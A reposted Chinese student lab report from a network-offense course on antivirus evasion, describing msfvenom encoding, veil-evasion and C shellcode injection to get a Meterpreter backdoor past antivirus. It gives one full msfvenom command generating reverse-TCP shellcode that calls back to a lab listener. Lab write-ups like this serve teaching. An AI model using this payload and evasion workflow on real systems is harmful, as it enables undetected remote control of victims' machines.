Exp3 免杀原理与实践

最新推荐文章于 2023-03-29 19:45:13 发布
转载 最新推荐文章于 2023-03-29 19:45:13 发布 · 55 阅读 · 0 ·
CC 4.0 BY-SA版权
原文链接:http://www.cnblogs.com/hxl681207/p/8777204.html

本文记录了一次网络对抗实验过程,包括使用msfvenom生成不同类型的文件、veil-evasion工具及shellcode编程等免杀技术实践。探讨了如何绕过杀毒软件检测,并分享了实验心得。

20155336《网络对抗》Exp3 免杀原理与实践

实践内容

  • 正确使用msf编码器,msfvenom生成如jar之类的其他文件,veil-evasion,自己利用shellcode编程等免杀工具或技巧
  • 通过组合应用各种技术实现恶意代码免杀
  • 用另一电脑实测,在杀软开启的情况下,可运行并回连成功,注明电脑的杀软名称与版本

基础问题回答

  • 杀软是如何检测出恶意代码的?
    • 三种:
      • 基于特征码的检测
      • 启发式恶意软件检测
      • 基于行为的恶意软件检测
  • 免杀是做什么?
    • 防止被杀软检测

  • 免杀的基本方法有哪些?

    • 改变特征码,
      • 加壳
      • 调用shellcode
    • 改变行为
      • 反弹式连接
      • 通讯方式
      • 操作模式

实验内容及步骤

  • MSF编码器

    1.首先尝试了一下第二次的实验后门

    1071513-20180409205838030-1699107158.png

    2.拿去检测

    1071513-20180409210731825-278921062.png

    3.一次编码结果

    1071513-20180409221401048-1695303797.png

    4.十次编码结果

    1071513-20180409222557685-1879405978.png

    1071513-20180409222731403-16507461.png

      可见,编码对免杀没有太大效果。

  • 使用veil-evasion生成后门程序及检测

      由于网速太慢~~就直接借鉴了老师的虚拟机

    1、启动evail-evasion,设置好回连的IP地址和端口号后,生成后门文件

    1071513-20180410104219950-689426946.png

    1071513-20180411125342359-1069216261.png

    1071513-20180411125116591-34305352.png

    1071513-20180410102156250-742136492.jpg

    还是会被杀软检测出来。

    回连:
    1071513-20180411124834527-1223195414.png

  • 注入Shellcode并执行

    在kali中进入终端,命令:msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.116 LPORT=5336 -f c

    生成数组:

    1071513-20180411142428739-1303773928.png

    交叉编译

    1071513-20180411142545258-1428709694.png

    查杀

    1071513-20180411142959525-1013222843.png

    回连

    1071513-20180410232316374-1208205880.jpg

    1071513-20180410232610321-368197493.jpg

    1071513-20180410232832626-507298230.jpg

实践总结与体会

做这次实验之前其实对我们现在生活中用到的杀毒软件已经有了一些基本的认识————就是 一点卵用都不会有的!!!!!(深有体会)。做完这次实验之后就更加证实了我的看法电脑体检,定期杀毒都只是寻求一点心理安慰罢了杀个心安理得而已,该感染还是感染TvT。总而言之,在上网的时候,还是要提高防范意识,钓鱼链接不要轻易点开,否则一旦感染上病毒,那么自己的信息轻而易举的就被别人窃取利用。

转载于:https://www.cnblogs.com/hxl681207/p/8777204.html

EXP3 原理实践
ISrookie的博客
04-06 746
exp3 原理
20204323太晓梅 网络对抗技术 exp3 原理实践
m0_57567318的博客
03-30 367
但是黑客实现的手段和技术还是不断进步的,我们还需要提高自己的安全意识,及时更新自己的毒防护软件,才能有效应对被手段保护到的恶意程序。同时,由于技术的存在,我们也应该认识到毒软件并不能保障100%的安全,因此我们平时也要提高安全意识,不随便下载和点击来历不明的文件,谨防恶意代码的攻击。查看错误提示显示是文件未找到,初步推测应该是执行加密加壳的程序所在的文件夹无法找到作为模板去加壳的文件,于是把文件复制到hyperion所在的目录下,但是仍然显示找不到文件。此时就能成功进行操作了。
20155339 Exp3 原理实践
weixin_30672295的博客
04-08 183
20155339 Exp3 原理实践 基础问题 (1)软是如何检测出恶意代码的? 基于特征码的检测(软的特征库中包含了一些数据或者数据段,软会尽可能的更新这个特征库,以包括尽可能多的恶意代码,当一个可执行文件(或其他运行的库、脚本等)包含这样的数据则被认为是恶意代码)。 启发式恶意软件检测(很简单,就是根据些片面特征去推断,也就是进行检测,当某个软件或者程序想干一些看起来...
Exp3-原理实践-20202127
qq_57435798的博客
03-29 1207
本此实验遇到的比较大的问题就是veil的安装,当时反复出现wine32缺失的报错,按照系统给的命令操作之后,却又一直卡在某一行,我也不知道是这一步就应该等待这么久还是我的操作出现了问题,反复多次尝试之后,我在操作到那一步之后,出去吃了顿晚饭,回来之后就惊喜地发现veil已经安装完毕,由此,我也确定了我的操作并没有问题,只是确实需要等待很久。同时,由于恶意代码也会随着科技进步发展变化,只能说是最大程度地去防止恶意代码,而且不同的软有不同的性能,对于恶意代码的防范也有一定的局限性,所以绝对是很难做到的!
Exp3 原理实践 20164320 王浩
weixin_34409741的博客
03-31 208
一、实验内容 1.1 正确使用msf编码器(0.5分),msfvenom生成如jar之类的其他文件(0.5分),veil-evasion(0.5分),加壳工具(0.5分),使用shellcode编程(1分) 1.2 通过组合应用各种技术实现恶意代码(0.5分)(如果成功实现了的,简单语言描述原理,不要截图。软共生的结果验证要截图。) 1.3 用另一电脑实测,在软开启的情况下,可...
EXP 3 原理实践
dianquekuai3232的博客
04-09 237
一、基础问题回答 软是如何检测出恶意代码的? 根据特征来检测:恶意代码常常具有明显的特征码也就是一段数据,软检测到具有该特征码的程序就当作检测到了恶意代码。 根据行为来检测:如果一个程序的行为是带有恶意的行为,那么这个程序也会被认为是恶意代码,有时候不是恶意代码的程序也会把查,因为这些程序做了一些计算机认为不安全的事情,比较常见的就是各自破解补丁或者游戏外挂等。 ...
2017-2018-2 20155314《网络对抗技术》Exp3 原理实践
axhc_chentao1981的博客
04-11 670
2017-2018-2 20155314《网络对抗技术》Exp3 原理实践 目录 实验要求 实验环境 预备知识 实验步骤 1 效果实测 1.1 恶意代码生成工具 1.2 效果的评价 1.2.1 VirusTotal、Virscan 1.2.2 效果参考基准 1.3 Msfvenom 1.4 Veil-Evasion 1.5 C语言调用Shellcode,Li...
20155325 Exp3 原理实践
azxkjsh204704390的博客
04-10 273
基础问题回答 软是如何检测出恶意代码的? 1.1 基于特征码的检测 1.1.1 特征库举例-Snort 1.2 启发式恶意软件检测 1.3 基于行为的恶意软件检测 是做什么? 一般是对恶意软件做处理,让它不被毒软件所检测。也是渗透测试中需要使用到的技术。 的基本方法有哪些? 手工修改; 非源码 数据 如果特征码定位到数据(通过IDA/OD等确认),其实不好修改,稍微不慎就...
Exp3 原理实践 20204308李文艳
m0_61155000的博客
03-26 494
整个实验做下来,让我感触最深的是软和之间的博弈,通过不同方式,可以在一定程度上逃避软的检测。同时,对于如果自我开发程序,找到一些特殊的方式,软又会完全察觉不到恶意程序,这再一次警醒了我需要科学上网,提高网络安全意识。感觉做的这些实验都很有趣,通过几次实验,也看到了自己的进步,以前出现问题都可能处于一个不知的状态,因为不会去看命令后的显示的英文。而现在逐渐养成了一种意识,关心了解一下,命令行输入后出现的提示语或结果,有时可以知道解决方法就在提示中。
20192209 Exp3-原理实践
LIULIULOO的博客
04-08 545
20192209 Exp3-原理实践 Exp3-原理实践 1.基础问题回答 ~问:软是如何检测出恶意代码的? 答:有多种方式检测出恶意代码:1.基于特征码的检测,毒软件会记录下一部分恶意软件的特征码;2.利用启发式恶意软件检测;3.基于行为的恶意软件检测。2和3在上学期的信安课程中有过部分阐述。 ~问:是做什么? 答:运用一些手段给恶意软件或是病毒木马等增加伪装使毒软件不能识别或查。 ~问:的基本方法有哪些? 答:改变特征码、加壳:压缩壳 加密壳、更改语言重新编译、改变行为、社会
20194301刘畅Exp3-原理实践
qq_54196192的博客
04-09 367
目录 一、实验概述 1.实验目的: 2.主要任务: 3.实验环境: 二、基础问题回答 1.软是如何检测出恶意代码的? 2.是做什么? 3.的基本方法有哪些? 4.开启软能绝对防止电脑中恶意代码吗? 三、实验过程 (〇)查看可使用的payload和编码器 1.payload 2.编码器 (一)正确使用MSF编码器,使用msfvenom生成如jar之类的其他文件 1.检测实验二生成的后门文件(53/69) 2.使用Unicode编码一次 (53/69) 3..
20194307肖江宇Exp3原理实践
MYRLY的博客
04-08 4926
文章目录Exp3-原理实践1 基础问题回答1.1 软是如何检测出恶意代码的?1.2 是做什么?1.3 的基本方法有哪些?​1.4 开启软能绝对防止电脑中恶意代码吗?2 实验环境3 实践内容3.1 正确使用msf编码器,使用msfvenom生成如jar之类的其他文件3.2 veil,加壳工具3.3 使用C + shellcode编程3.4 通过组合应用各种技术实现恶意代码 Exp3-原理实践 1 基础问题回答 1.1 软是如何检测出恶意代码的? 基于特征码进行检测: 毒软件的病
toxiproxy-java-2.1.7.jar中文-英文对照文档.zip
09-05
1、压缩文件中包含: 中文-英文对照文档、jar包下载地址、Maven依赖、Gradle依赖、源代码下载地址。 2、使用方法: 解压最外层zip,再解压其中的zip包,双击 【index.html】 文件,即可用浏览器打开、进行查看。 3、特殊说明: (1)本文档为人性化翻译,精心制作,请放心使用; (2)只翻译了该翻译的内容,如:注释、说明、描述、用法讲解 等; (3)不该翻译的内容保持原样,如:类名、方法名、包名、类型、关键字、代码 等。 4、温馨提示: (1)为了防止解压后路径太长导致浏览器无法打开,推荐在解压时选择“解压到当前文件夹”(放心,自带文件夹,文件不会散落一地); (2)有时,一套Java组件会有多个jar,所以在下载前,请仔细阅读本篇描述,以确保这就是你需要的文件。 5、本文件关键字: jar中文-英文对照文档.zip,java,jar包,Maven,第三方jar包,组件,开源组件,第三方组件,Gradle,中文API文档,手册,开发手册,使用手册,参考手册。
perl-enum-1.11-12.el8.tar.gz
09-05
# 适用操作系统:Centos8 #Step1、解压 tar -zxvf xxx.el8.tar.gz #Step2、进入解压后的目录,执行安装 sudo rpm -ivh *.rpm
混合智能优化算法在工程调度问题中的创新应用.docx
09-05
混合智能优化算法在工程调度问题中的创新应用.docx
存储系统Dell EMC Unity XT硬盘兼容性矩阵:支持驱动型号最低OE版本配置指南
最新发布
09-05
内容概要:本文档为戴尔Dell EMC Unity XT存储系统的硬盘操作环境(OE)兼容性矩阵,详细列出了支持的硬盘型号、容量、封装尺寸、部件号、驱动器类型、适用的阵列型号以及所需的最低OE版本。文档涵盖SAS Flash 2、SAS Flash 3、SAS Flash 4固态硬盘及HDD机械硬盘,适用于全闪存池、混合阵列和FAST缓存等配置,并特别注明NEBS合规型号及其适用的直流电源型号。同时强调UnityUnity XT系统使用专用硬盘部件号,不可互换使用。; 适合人群:企业IT运维人员、存储系统工程师、戴尔存储产品技术支持人员;具备一定存储设备管理经验的技术人员。; 使用场景及目标:①为Unity XT存储系统选型和扩容提供硬盘兼容性参考;②确保升级或更换硬盘时满足最低OE版本要求,避兼容性问题;③指导在不同机型(如Unity 380F DC)中正确选择符合NEBS标准的硬盘; 阅读建议:使
P1快速部署自己的yolov504:c++-mingw P2快速部署自己的yolov505c++-cmake+mingw
09-05
【P1】快速部署自己的yolov504:c++-mingw 【P2】快速部署自己的yolov505c++-cmake+mingw
操作系统课设(2).zip
09-05
操作系统课设(2).zip
EXP快递公司管理系统开发实践指南
4. 数据库原理应用:了解数据库的基本概念,如关系型数据库的表、视图、索引、事务、查询语言(如SQL)等,并探讨如何将这些知识应用于快递公司管理系统中。 5. 配置管理:解释软件配置的重要性,包括环境变量...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值